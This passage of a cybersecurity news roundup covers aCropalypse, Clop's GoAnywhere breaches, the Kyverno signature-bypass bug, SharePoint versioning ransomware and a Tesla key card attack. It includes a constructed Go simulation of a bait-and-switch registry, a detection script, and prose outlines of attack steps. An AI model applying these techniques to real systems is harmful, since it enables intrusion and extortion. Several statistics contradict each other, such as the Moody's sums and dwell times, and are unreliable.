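    print(check_cropped_file(full, crop))  # trailing_bytes > 0
```

A non-zero trailing_bytes value is the signal to re-crop and re-save the file, as the article advises; the audit deliberately stops at IEND and never interprets what follows it.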

Analysis: A Quick Fix for a Worrying Bug 

Initially, recovering the cropped-out part of an image may not appear to be a particularly severe security vulnerability. After all, who would care if someone manages to recover some empty sky that you removed from a vacation photo? 

However, there are many reasons why this is a serious problem, as tech journalists know all too well. Cropped images can expose personal and important information, like email addresses, bank account numbers and contact details. Users are therefore well advised to crop out such information before sharing an image widely over the internet. 

In today’s era, where so many photos are shared with others and on the web at large, it is important from a security perspective that these images do not expose more than we want them to, which was exactly the concern with CVE-2023-28303. 

Although Microsoft has acted quickly to patch the issue, it is still concerning that the same bug turned up in two completely separate pieces of software from Microsoft and Google in recent days.  

A GoAnywhere MFT hack Exposes Hatch Bank's Data Breach


 

Hackers exploited a zero-day vulnerability in Hatch Bank's internal file transfer software, gaining access to thousands of customers' Social Security numbers, according to Hatch Bank, a digital-first bank that provides infrastructure for fintech companies offering their own brand credit cards. 

According to Hatch Bank, security breaches have affected almost 140,000 customers as hackers were able to access sensitive customer information from its Fortra GoAnywhere MFT secure file-sharing platform, which allows customers to access their online accounts from anywhere. 

In addition to providing small businesses with access to a variety of banking services, Hatch Bank is also a financial technology company. 

TechCrunch reported today that the data of 139,493 customers had been stolen by hackers who exploited a vulnerability in the GoAnywhere MFT software, according to a breach notification submitted to the Attorney General's office. 

Based on that notification, Fortra experienced a cyber incident on January 29, 2023, after discovering a vulnerability in its software. 

Fortra notified Hatch Bank of the incident on February 3, 2023, informing it that files hosted on Fortra's GoAnywhere site had been compromised. According to Hatch, it obtained a copy of the stolen data, reviewed it, and found that the attackers had gotten hold of customer names as well as Social Security numbers. 

Affected customers of the bank are entitled to a free twelve-month credit monitoring service from the bank as part of their compensation package. 

Earlier this month, Community Health Systems (CHS) revealed it had suffered a data breach caused by the GoAnywhere MFT attack, making this the second confirmed breach in the past month. 

GoAnywhere Breaches Linked to Clop Ransomware

Despite Hatch Bank not disclosing which threat actor was responsible for the attack, BleepingComputer was told that the Clop ransomware gang conducted these attacks. 

Approximately 130 organizations were breached and their data was stolen. The ransomware group is said to have exploited the zero-day vulnerability in Fortra's GoAnywhere MFT platform to steal data over a period of more than ten days. 

The vulnerability is now tracked as CVE-2023-0669 and allows remote threat actors to gain remote code execution on vulnerable servers. Fortra disclosed the vulnerability in GoAnywhere to its customers in early February, after learning that it was being actively exploited in attacks. 

It was later revealed that an exploit for the platform was released on February 7th, only a day before it was patched. 

Fortra did not respond to our emails requesting more information about the attacks, and BleepingComputer was unable to independently confirm Clop's claims that it was behind them. 

It has been discovered that the GoAnywhere MFT was also linked to TA505, the hacking group well known for the deployment of Clop ransomware, according to Huntress Threat Intelligence Manager Joe Slowik. 

In December 2020, Clop used a similar tactic to steal data from companies worldwide by exploiting a zero-day vulnerability in Accellion's File Transfer Appliance (FTA). 

With Accellion FTA, organizations have a secure way of sharing files with their clients, much like they would with GoAnywhere MFT. 

The Clop ransomware gang gave the victims of these attacks an ultimatum, demanding a $10 million ransom in return for not publishing the stolen data. 

Numerous organizations have disclosed related breaches; Morgan Stanley, Qualys, Shell, and Kroger are a few of the most notable companies that published their reports related to the Accellion FTA attacks. Several other universities around the world, including Stanford Medicine, the University of Colorado, UCLA, and the University of Colorado-Boulder were also affected by the incident. 

In the event of a GoAnywhere MFT attack, Clop may well demand a similar ransom from its victims. If the gang follows its usual tactics, the stolen data will soon appear on its data leak site.

Clop Ransomware Flaw Permitted Linux Victims to Restore Files for Months

 

The first Linux version of the Clop ransomware has been discovered in the wild, but with a flawed encryption algorithm that enables the process to be reverse-engineered. 

"The ELF executable contains a flawed encryption algorithm making it possible to decrypt locked files without paying the ransom," SentinelOne researcher Antonis Terefos said in a report shared with The Hacker News.

The cybersecurity firm, which has made a decryptor available, said it discovered the ELF version on December 26, 2022, and noted similarities to the Windows flavor in that it employs the same encryption method. The detected sample is said to be part of a larger attack targeting educational institutions in Colombia, including La Salle University. According to FalconFeedsio, the university was added to the criminal group's leak site in early January 2023.

The Clop (stylized as Cl0p) ransomware operation, which has been active since 2019, dealt a major blow in June 2021 when six members of the group were arrested by police as part of an international law enforcement operation codenamed Operation Cyclone.

However, the cybercrime group made an "explosive and unexpected" comeback in early 2022, claiming dozens of victims from the industrial and technology sectors. SentinelOne classified the Linux version as an early-stage version due to the absence of some functions found in the Windows counterpart.

This lack of feature parity is also explained by the malware authors' decision to create a custom Linux payload rather than simply porting over the Windows version, implying that future Clop variants may close the gap.

"A reason for this could be that the threat actor has not needed to dedicate time and resources to improve obfuscation or evasiveness due to the fact that it is currently undetected by all 64 security engines on VirusTotal," Terefos explained.

The Linux version is intended to encrypt specific folders and file types, with the ransomware containing a hard-coded master key that can be used to recover the original files without paying the threat actors. If anything, the development indicates a growing trend of threat actors branching out beyond Windows to target other platforms.

Terefos concluded, "While the Linux-flavored variation of Cl0p is, at this time, in its infancy, its development and the almost ubiquitous use of Linux in servers and cloud workloads suggests that defenders should expect to see more Linux-targeted ransomware campaigns going forward."

Government Issues High-risk Warning for iPhone Users

 

Apple iPhones are known for their robustness and security features. The Cupertino-based tech behemoth releases security updates for its devices on a regular basis. Although Apple recommends that people install the most recent builds of iOS on their iPhones for a more secure and feature-rich operating system, older iPhone models are unable to install the most recent updates due to hardware limitations. 

Some users prefer to run older versions of iOS for simplicity of use, but it is important to note that older iOS versions are easier to exploit. One such flaw has been discovered in Apple's iOS, and the Indian government has issued a warning to iPhone users.

According to the Indian Computer Emergency Response Team (CERT-In) of the Ministry of Electronics and Information Technology, a vulnerability in iOS has been disclosed that could permit an attacker to execute arbitrary code on the targeted device. Apple iOS versions prior to 12.5.7 are vulnerable on iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation).

This vulnerability exists in Apple iOS due to a type confusion flaw in the WebKit component, according to CERT-In. An attacker could exploit it by luring the victim to a maliciously crafted website, and a successful exploit may allow the attacker to execute arbitrary code on the targeted device. 

The security flaw is actively being exploited against iOS versions prior to iOS 15.1. To stay protected, install the new iOS 12.5.7 update, which Apple released earlier this week.

Kubernetes can be Hacked due to a Container Verification Bug

 


An extremely serious vulnerability in the Kyverno admission controller for container images could allow malicious actors to import a raft of malicious code into the production environments of cloud providers. 

The Kyverno admission controller provides signature verification as a mechanism for ensuring that only validated, signed container images are pulled into a given Kubernetes cluster. This averts many potentially disastrous scenarios: booby-trapped container images can carry a wide range of malicious payloads, including cryptominers, rootkits, container escapes, lateral movement exploit kits, credential stealers, and more. 

However, a bug (CVE-2022-47633) can be exploited to undermine this mechanism. An attacker could take advantage of the vulnerability to inject unsigned images into any protected cluster, bypassing the image verification policy, researchers at ARMO stated in a blog post on Dec. 21. 

The stakes are high: an attacker can effectively take control of a victim's pod and gain access to all of the pod's assets, credentials, and service account tokens, including the token used to access the API server, the researchers cautioned. 

By exploiting the vulnerability, an attacker can completely bypass image signature verification, which opens up a wide range of options for attacking a Kubernetes cluster. Ben Hirschberg, CTO and co-founder of ARMO, notes that any workload can mount cluster secrets and data volumes. With this kind of access to the victim's Kubernetes cluster, the attacker can inject code that steals data and credentials from the cluster, or inject their own code to use the victim's CPU for cryptocurrency mining. 

Subverting the Container Admission Controller: An inside look at the bug 

When a new workload defined via an image with a tag is requested from the Kubernetes API server, the API server sends a request to the Kyverno admission controller to validate the new workload. 

The admission controller determines in several ways whether a workload is admissible to the cluster, including requesting the image manifest and the signature from the container registry.

If the image passes these checks, the container runtime starts a new workload based on the image; if it does not, the workload is not admitted. 

According to the advisory, the vulnerability was discovered as a result of the controller's signature validation process downloading the image manifest twice - but only verifying the signature for one of those downloads. 

Hence, the attack looks like this: an administrator is socially engineered into pulling a container image from a malicious registry or proxy. On the initial request, the malicious registry returns a valid, benign, signed image to the admission controller. So far, everything seems to be working well. 

The admission controller then issues a second request for the manifest of the signed image so that it can retrieve the digest used for mutation, which replaces the human-readable tag associated with the container. No signature validation is performed on this second request, so the malicious registry can return a different, unsigned and malicious image. That image is ultimately the one that will run on the cluster. 

This is a classic example of a TOCTOU (time-of-check to time-of-use) problem, in which an attacker can bait and switch their victim, according to a research paper published by ARMO. 

Because the image manifest that is used in the end is a different one from the one that was verified, the attacker has the chance to trick the client. 

Kyverno users should update to version 1.8.5 as soon as possible: the vulnerability was introduced in version 1.8.3 and is fixed in the updated version. The patch ensures that the same image hash is used both for verifying the signature and for mutating the workload specification. 

This vulnerability affects only Kubernetes clusters that use the Kyverno admission controller. Hirschberg warned, however, that other methods of verifying image signatures also need to take care not to be vulnerable to this technique. 
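To make the double-download flaw concrete, here is an added example in Go (not Kyverno's code) that models the admission flow against a constructed bait-and-switch registry; the manifest, registry, verifier and function names are all hypothetical, and the fixed flow simply reuses the digest it verified.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// Manifest is a constructed stand-in for an OCI image manifest; only its digest matters here.
type Manifest struct{ Body string }

func (m Manifest) Digest() string {
	sum := sha256.Sum256([]byte(m.Body))
	return "sha256:" + hex.EncodeToString(sum[:])
}

// Registry resolves an image reference to a manifest.
type Registry interface {
	Manifest(ref string) (Manifest, error)
}

// Verifier stands in for cosign-style signature lookup: a constructed allowlist of signed digests.
type Verifier map[string]bool

// BaitAndSwitchRegistry models the malicious registry or proxy from the article: the
// first fetch of a tag returns the benign signed image, every later fetch returns a
// different, unsigned image. Tags are mutable, which is what the swap relies on.
type BaitAndSwitchRegistry struct {
	benign, malicious Manifest
	tagFetches        map[string]int
}

func (r *BaitAndSwitchRegistry) Manifest(ref string) (Manifest, error) {
	r.tagFetches[ref]++
	if r.tagFetches[ref] == 1 {
		return r.benign, nil
	}
	return r.malicious, nil
}

// pinToDigest rewrites name:tag as name@digest, the mutation the admission controller
// applies to the workload specification (simplified: no registry port in the name).
func pinToDigest(tagRef, digest string) string {
	return strings.SplitN(tagRef, ":", 2)[0] + "@" + digest
}

// verifiedDigest downloads the manifest for tagRef and checks its signature.
func verifiedDigest(reg Registry, v Verifier, tagRef string) (string, error) {
	m, err := reg.Manifest(tagRef)
	if err != nil {
		return "", err
	}
	if !v[m.Digest()] {
		return "", errors.New("image signature verification failed")
	}
	return m.Digest(), nil
}

// admitVulnerable mirrors the flawed flow: verify the first download, then download the
// manifest again for the mutation digest without re-checking it. The result is the
// reference the container runtime would pull.
func admitVulnerable(reg Registry, v Verifier, tagRef string) (string, error) {
	if _, err := verifiedDigest(reg, v, tagRef); err != nil {
		return "", err
	}
	second, err := reg.Manifest(tagRef) // second fetch, never verified
	if err != nil {
		return "", err
	}
	return pinToDigest(tagRef, second.Digest()), nil
}

// admitFixed closes the TOCTOU window as the article describes the patch: the digest
// that was verified is the digest written into the spec, so no second fetch is needed.
func admitFixed(reg Registry, v Verifier, tagRef string) (string, error) {
	d, err := verifiedDigest(reg, v, tagRef)
	if err != nil {
		return "", err
	}
	return pinToDigest(tagRef, d), nil
}

// newScenario builds the constructed registry and verifier used below.
func newScenario() (*BaitAndSwitchRegistry, Verifier) {
	benign := Manifest{Body: "benign-signed-image-v1"}
	malicious := Manifest{Body: "unsigned-image-with-cryptominer"}
	reg := &BaitAndSwitchRegistry{benign: benign, malicious: malicious, tagFetches: map[string]int{}}
	return reg, Verifier{benign.Digest(): true}
}

func main() {
	const tagRef = "registry.example/app:v1"
	reg, v := newScenario()
	vuln, _ := admitVulnerable(reg, v, tagRef)
	fmt.Println("vulnerable flow pins the swapped image:", strings.HasSuffix(vuln, reg.malicious.Digest()))
	reg, v = newScenario() // fresh registry so the tag's first fetch is benign again
	fixed, _ := admitFixed(reg, v, tagRef)
	fmt.Println("fixed flow pins the verified image:", strings.HasSuffix(fixed, reg.benign.Digest()))
}
```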

Concerns About Container Security are on the Rise 

Hirschberg has noted that containers are an excellent target for cybercriminals because they are typically hosted in the cloud. This gives them access to a huge amount of computational resources, which are extremely valuable and expensive. This enables hackers to steal computational resources and data in a relatively short time while also staying unnoticed for a long period. 

According to him, there are no exact statistics. However, based on the current trend of containers being widely adopted, it is clear that this type of problem is becoming more prevalent in the industry. 

"Security teams are learning how to handle them, and Kubernetes in general. I don't think that it is a true 'blind spot,' but container security teams are still learning the whole environment with many neglected areas", Hirschberg added.

Even though image signature verification has only just begun to take off, admission controllers still represent one of those areas that may have been neglected due to the early stage of their adoption. Nonetheless, they are also part of a broader dialogue that should be held about software supply chain security, one that treats them as an imperative issue. 

Hirschberg indicated that during the SolarWinds attack the world saw how sensitive this issue is when it comes to trusting the security of external code. Kyverno is a security tool that brings signature validation into the Kubernetes world for the first time, and with it come additional vulnerabilities. However, those vulnerabilities also bring security improvements that will enable users to overcome this issue in the future.

Researchers Updated Twitter Data Breach as “More Harmful” Than Reported


Last year, Twitter exposed more than five million phone numbers and email addresses following a massive data breach. The research team of 9TO5Mac has been provided with evidence that suggests the same security vulnerability was exploited by multiple threat actors at the same time. Additionally, several sources have advertised the availability of the hacked data on the dark web for sale as well. 

This vulnerability was first reported back in January via HackerOne. Using it, anyone could enter a phone number or e-mail address and find the Twitter account associated with it. A Twitter handle and the internal identifier that Twitter uses for the account can easily be converted into one another. 

In practice, a threat actor would be able to construct a single database combining Twitter handles with email addresses and phone numbers accumulated from the web. 

When Twitter released an announcement in May, it confirmed that the vulnerability existed and had been patched, but it did not mention that anyone had exploited it. 

According to a RestorePrivacy report, a hacker had indeed used the vulnerability to gain access to millions of accounts around the world and had obtained personal information as a result. 

There has been a massive breach of Twitter data, and not just one

In a Twitter thread yesterday, it was suggested that several threat actors had accessed the same personal data independently. Having seen evidence of multiple breaches, 9to5Mac can now verify that this is indeed the case. 

The security researchers explained that, in a previous report, they had seen a dataset containing the same information in a different format, and their source told them it came from "definitely a different threat actor." The researchers at 9to5Mac found that this dataset was just one of several similar files. 

The majority of the data is based on Twitter users in the UK, most EU member countries, and several US states. 

The setting the security researchers are referring to here is buried quite deeply within Twitter's settings, and it appears to be on by default. 

An estimated 500k records were downloaded within one hour by the bad actors, it has been reported. On the dark web, multiple sources have offered this data for sale for between $5,000 and $10,000. 

It has been reported that a security expert's account was suspended after tweeting about it, and another security specialist's Twitter account was suspended the same day. Chad Loder, a well-recognized computer security expert, predicted Twitter's reaction within minutes of the announcement, and other experts confirmed it. 

There is evidence that multiple hackers have obtained the same data and combined it with data sourced from other breaches.

Cyber-Spy Exploits are Being Dropped by Drones


The use of drones equipped with cyber-spying equipment was previously limited to abstract academic discussions among cybersecurity enthusiasts, but now, drones can be used in the real world to penetrate networks and steal information. 

On October 10, cybersecurity researcher Greg Linares published a Twitter thread providing a brief overview of a drone-based cyberattack he had recently witnessed while working as a freelance researcher.  

According to the thread, the incident began when an unnamed financial company picked up unusual traffic on its network. In tracing the Wi-Fi signal, the company discovered two drones on the roof, along with other unusual activity on the network. 
 
Linares described one of the drones as a modified DJI Phantom carrying what he called a "modified Wifi Pineapple device" and the other as a similarly modified DJI Matrice 600 that contained "a Raspberry Pi, batteries, GPD mini laptop, a 4G modem, and another Wi-Fi device." 

Linares explained that the attackers were also able to reach devices connected to the company's internal Atlassian Confluence site, with the aim of stealing credentials and other information. During the investigation, the threat hunters found that one of the drones had been damaged but was still functional. 

"In light of the limited success of this attack, it appears that once the attackers were detected, they crashed the drone as they were recovering it from the ground," Linares claimed on Twitter.

He further explained that a drone attack of this kind would probably not cost more than $15,000 to be put together, although he did not provide an exact figure. 

As he explained in his warning, attackers are willing to spend this amount of money on the hardware and do not care about destroying it. "This is the third real-world attack I have encountered from a drone in the last two years," he added. 

Ransomware is Now the Top Attack Vector Due to Bug Exploitation

 



Security experts at Secureworks have revealed that vulnerability exploitation has accounted for 52% of ransomware incidents investigated by the company over the past 12 months. This makes it the number one initial access vector for attackers, according to a new report published by the company.

The security firm's annual State of the Threat report is compiled from the insight gathered by its Counter Threat Unit over the past year.

A leading ransomware researcher found that last year ransomware actors mainly used vulnerabilities in systems exposed to the Internet to gain initial access, rather than relying on stolen credentials, which are often associated with the compromise of Remote Desktop Protocol (RDP), or on malicious emails.

The report suggested that this shift in tactics may be a direct result of a significant imbalance between the capabilities of threat actors and those of network defenders.

At the same time as threat actors rapidly weaponize newly discovered vulnerabilities, developers of offensive security tools (OSTs), driven by the need to generate profit or keep their tools relevant, also implement updated exploit code as soon as possible, the report noted. 

It is often overlooked that responsible disclosure frequently does not wait for a patch to become available. Even when a patch is available, patching a vulnerability in an enterprise environment is far more complicated and much slower than the process by which threat actors or OST developers weaponize publicly accessible exploit code.

As a result, vulnerability management teams must also take precautions against the persistent threat of credential-based attacks. In a recent report, Secureworks noted a 150% growth in the use of info-stealers designed to grab credentials from networks and use them to gain access and steal sensitive information.

On a single day in June, an anti-virus vendor claimed to have observed over 2.2 million credentials that had been collected by information-stealing criminals and put up for sale on an underground platform.

According to Secureworks, ransomware continues to represent the number one threat to global organizations, accounting for more than a quarter of the attacks analyzed by the company. Among the threats that have been reported, most of them have been linked to Russian cybercrime groups.

So far this year, the good news is that the median dwell time of attackers has dropped from 22 days in 2021 to 11 days. This is a decrease of two days from last year, but it still leaves attackers with plenty of time to steal data from organizations and deploy the payloads for ransomware attacks.

Preventions for ransomware attacks


Safeguarding your systems from malware attacks includes simple yet effective measures like:

• Never click on unknown or unauthorized links.
• Never input your personal information on unofficial stores or websites.
• Never open unknown attachments in emails.
• Never plug in unknown USB sticks.
• Never download any software or application from unauthorized sources.
• Always keep your systems up to date.
• Always use a VPN when working over public Wi-Fi.
 
To ensure that the vulnerabilities do not get exploited, you need to identify and address them as soon as possible. Keeping track of your vital systems and their security is impossible without implementing an effective vulnerability management system (VM). 

Choosing the right VM tools is important as they provide accuracy, guidance in the right directions, and efficiency, to help your team in dealing with the most critical vulnerabilities. Once you establish a scalable and sustainable VM program you will be capable of defending your systems from ransomware attacks.

Moody's Intensifies its Scrutiny Of the 'Riskiest' Sectors Of the Economy

 



According to Moody's Investors Service, nearly $22 trillion of global rated debt has a "high" or "very high" level of cyber-risk exposure. This includes electrical, gas, and water utilities, as well as hospitals, which are among the sectors with the greatest risk of cyberattacks.

In total, Moody's has rated nearly 80 trillion dollars in debt across 71 different sectors around the globe. This represents a quarter of the $180 trillion in debt that Moody's has rated worldwide, and an increase of nearly a billion dollars from the firm's 2019 numbers.

According to Moody's, the Cyber Heatmap takes into account two factors, exposure and mitigation, which it weighs equally across all the sectors it rates for this report.

A major component of exposure is the industry's "systemic role", that is, how appealing it is from an attacker's perspective for disrupting a wide array of industries, along with its interconnectedness with other sectors. Moody's also emphasized that "digitalization" has increased the attack surface by extending sectors' digital footprint.

Mitigation covers measures that reduce perimeter vulnerability as well as basic cybersecurity practices, assessed against financial loss estimates. In determining perimeter vulnerability, Moody's takes into account at-risk open ports and patching cadence, using data and metrics provided by cyber-ratings company BitSight, in which Moody's owns a minority stake.

"It has been mentioned before that poor patches can have a significant impact on a company's risk of ransomware, as well as reports of a high rate of ransomware instances," BitSight chief risk officer Derek Vadala said in a press release.

According to Moody's, this year's Heatmap provides insight into cyber risk within the 71 sectors. The information is based on exposures and mitigations, which Moody's has categorised as "low," "moderate," "high" and "very high" risk. Utility companies were found to have high levels of cyber risk.

In this sector, which has a total amount of $2.5 billion in collective debt rated by Moody's, there are both regulated and self-regulated electric utilities operating in the generation, transmission, and distribution of electricity and gas. There are also unregulated electric and power companies, as well as water and wastewater companies. Moody's noted, "this does not mean the issuers within these sectors have weak cybersecurity practices."

Most economists believe that it has more to do with the "multiplier effect across an economy," as per the report. Cyberattacks that knock out a regional power grid, for example, will have far more consequences than simply for the utility itself. Hospitals may be unable to provide life-saving surgery or critical medicine to patients if a cyberattack knocks them out of service. For assisted living facilities, it would be extremely challenging for them to keep their elderly residents comfortable during heat waves or cold snaps. This is because they cannot provide heat or air conditioning.

There is no doubt that this is why critical infrastructure has become such an attractive target for cybercriminals seeking to cause the most damage, as evidenced by the seemingly constant barrage of government warnings regarding nation-state threat groups targeting power systems and infrastructure.

As far as cyber risk is concerned, non-profit hospitals also ranked extremely high in terms of the threats they face. In Moody's view, non-profit hospitals are particularly attractive targets for attackers because of the huge amount of data these institutions possess, as well as the only average mitigation measures they have in place to reduce the impact of potential cyber threats. 

Banks, the technology sector, telecommunications, and midstream energy are among the sectors with the highest levels of risk. Meanwhile, in the Heatmap, some sectors have moderate levels of risk, such as advanced economies and emerging regions, regional and local governments, manufacturing, retail and apparel, and integrated oil.

Low-risk sectors include structured finance, real estate, independent exploration and production, mining, and public housing. The analysis shows a significant increase in the number of ransomware attacks against hospitals and healthcare organizations over the last few years, which in turn calls for strict cyber security measures. 

Researchers Alert About Ransomware Attacks Targeting Microsoft Cloud ‘Versioning’ Feature

Researchers detected a functionality in Office 365 that enables cybercriminals to ransom items stored on SharePoint and OneDrive. When the researchers informed Microsoft, they were assured that the system was functioning as designed and it is a feature rather than a vulnerability. 

Files stored and updated in the cloud have long been thought to be resistant to encryption extortion: the autosave and versioning capabilities should offer enough backup capability. Researchers at Proofpoint have demonstrated that this is a false assumption. They reported, “Our research focused on… SharePoint Online and OneDrive… and shows that ransomware actors can now target organizations’ data in the cloud and launch attacks on cloud infrastructure.” 

There are two ways to accomplish this using the Microsoft versioning feature (which allows the user to specify the maximum number of older versions to be stored); older versions beyond this limit are difficult, if not impossible, to recover. The first attack is more theoretical than practical, while the second is undeniably practical. By default, the maximum number of revisions of a document that may be saved is 500. Simply put, the attacker modifies and encrypts the file 501 times. 

The changes do not have to be significant, just enough to cause the system to save the new (encrypted) version. By the end of the procedure all versions of the document are encrypted, and the file is unrecoverable without the decryption key. This is a theoretical attack: in practice it would be noisy and easily discovered. The second method is more practical: use the built-in user-controlled versioning setting to reduce the number of stored versions to one. 

Every SharePoint and OneDrive document library includes a user-configurable parameter for the number of stored versions, which can be found under list settings for each document library. Setting the version limit to zero does not help an attacker since it does not erase older versions that the user can still recover. 

If the limit is set to one, the file only has to be encrypted twice before the user loses access to its contents. If information is exfiltrated before encryption, the attacker has the option of launching a second extortion attempt. The attack chain includes initial access via compromised or hijacked user identities, account takeover and discovery, versioning reduction, file exfiltration and encryption, and extortion. 
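A defender-side illustration of the chain just described, added here and not part of the original post or of Proofpoint's research: a heuristic that flags a user who lowers a document library's version limit and then rewrites files in that library repeatedly within a short window. The event shape, operation names ("VersionLimitChanged", "FileModified") and sample records are constructed stand-ins, not Microsoft's real audit log schema.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, simplified audit-style events (not Microsoft's real schema).
# Fields: timestamp, user, operation, detail. "VersionLimitChanged" carries
# "<library>:<old>-><new>"; "FileModified" carries the file path.
SAMPLE_EVENTS = [
    ("2022-06-01T09:00:00", "alice@example.com", "FileModified", "Finance/budget.xlsx"),
    ("2022-06-01T10:15:00", "mallory@example.com", "VersionLimitChanged", "Finance:500->1"),
    ("2022-06-01T10:16:00", "mallory@example.com", "FileModified", "Finance/budget.xlsx"),
    ("2022-06-01T10:16:07", "mallory@example.com", "FileModified", "Finance/budget.xlsx"),
    ("2022-06-01T10:16:12", "mallory@example.com", "FileModified", "Finance/plan.docx"),
    ("2022-06-01T10:16:20", "mallory@example.com", "FileModified", "Finance/plan.docx"),
    ("2022-06-01T11:00:00", "bob@example.com", "VersionLimitChanged", "Legal:500->100"),
    ("2022-06-01T11:30:00", "bob@example.com", "FileModified", "Legal/contract.docx"),
]

def parse_limit_change(detail):
    """'Finance:500->1' -> ('Finance', 500, 1)"""
    library, change = detail.split(":")
    old, new = change.split("->")
    return library, int(old), int(new)

def find_versioning_abuse(events, window_minutes=60, min_rewrites=2, max_limit=1):
    """Flag a user who lowers a library's version limit to max_limit or below
    and then rewrites files in that library at least min_rewrites times each
    inside the window. Returns a list of alert dicts (empty = nothing found)."""
    events = sorted(events)  # ISO timestamps sort correctly as strings
    alerts = []
    for ts, user, op, detail in events:
        if op != "VersionLimitChanged":
            continue
        library, old, new = parse_limit_change(detail)
        # A limit of 0 does not purge existing versions (per the text above),
        # and a large limit is a normal admin change, so neither is flagged here.
        if new == 0 or new > max_limit:
            continue
        start = datetime.fromisoformat(ts)
        end = start + timedelta(minutes=window_minutes)
        rewrites = defaultdict(int)
        for ts2, user2, op2, path in events:
            t2 = datetime.fromisoformat(ts2)
            if (user2 == user and op2 == "FileModified"
                    and start < t2 <= end and path.startswith(library + "/")):
                rewrites[path] += 1
        hit = sorted(p for p, n in rewrites.items() if n >= min_rewrites)
        if hit:
            alerts.append({"user": user, "library": library, "old_limit": old,
                           "new_limit": new, "files": hit})
    return alerts
```

Running `find_versioning_abuse(SAMPLE_EVENTS)` on the constructed events yields one alert for the Finance library; Bob's reduction to 100 is ignored because it leaves ample history.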

If the file owner keeps a local copy of the file, the impact of this attack will be limited. In this case, the attacker must compromise both the endpoint and the cloud account to ensure success. Proofpoint followed the Microsoft disclosure route and submitted the vulnerability to Microsoft before publicly revealing it. 

Microsoft stated that, first, the versioning settings function properly, and that, second, previous versions of files can potentially be retrieved and restored for an additional 14 days with the aid of Microsoft Support. 

“However,” write the researchers, “Proofpoint attempted to retrieve and restore old versions through this process (i.e., with Microsoft Support) and was not successful. Secondly, even if the versioning settings configuration workflow is as intended, Proofpoint has shown that it can be abused by attackers towards cloud ransomware aims.”

Therefore, the conclusion of the story is straightforward: do not assume that files saved and updated in the cloud are immune to extortion attempts. Ransomware mitigation procedures must still be in place.

Researcher Demonstrated How Tesla Key Card Feature Can be Exploited to Steal Cars


A researcher demonstrated how a Tesla key card functionality launched last year might be misused to add an unauthorised key that enables an attacker to access and start a vehicle. 

Martin Herfurt, an Austria-based member of the Trifinite research group that specialises in Bluetooth security, conducted the study. Herfurt's research focused on key card access modifications made by Tesla in August 2021, which removed the necessity for customers to place the key card on the central console after using it to open the vehicle. 

The researcher discovered that when a Tesla is opened through NFC using the key card, there is a 130-second window during which an attacker within the Bluetooth range of the targeted vehicle may add their own key. The attack exploits Tesla's VCSEC protocol, which manages communication between the automobile, the phone app, and the key fob. 

Findings by the researcher: 

During such an assault, the infotainment system makes no attempt to warn the victim that a new key has been inserted. According to the researcher, he tried the attack on the Tesla Model 3 and Model Y, but he believes it should also work on the newer Model S and Model X. At the recent Pwn2Own 2022 hacking competition, hackers won $75,000 for an attack targeting Tesla's infotainment system. Herfurt intended to show off his attack at Pwn2Own, but relay attacks were not permitted. 

In reality, he claimed to have identified the authorisation timer attack vector in September 2021 but had been keeping it for Pwn2Own. The researcher stated that he did not inform Tesla about his recent findings before revealing them, since he believed the company was already aware of the problem. Following his disclosure, he received confirmation from others, who had reported a very similar issue to Tesla months earlier, that Tesla was aware of the vulnerability. 

According to the researcher, Tesla recommends using the PIN2Drive function, which requires customers to input a PIN before driving away, but he produced a video last week demonstrating how an attacker may overcome PIN2Drive. Tesla has yet to respond to a request for comment.

Herfurt is working on TeslaKee, a new smartphone application that is said to safeguard Tesla vehicles from these sorts of relay attacks. Herfurt demonstrated another approach to stealing a Tesla in May. The attacker utilised two Raspberry Pi devices to relay the radio signal between the Phone Key and an automobile over a considerable distance.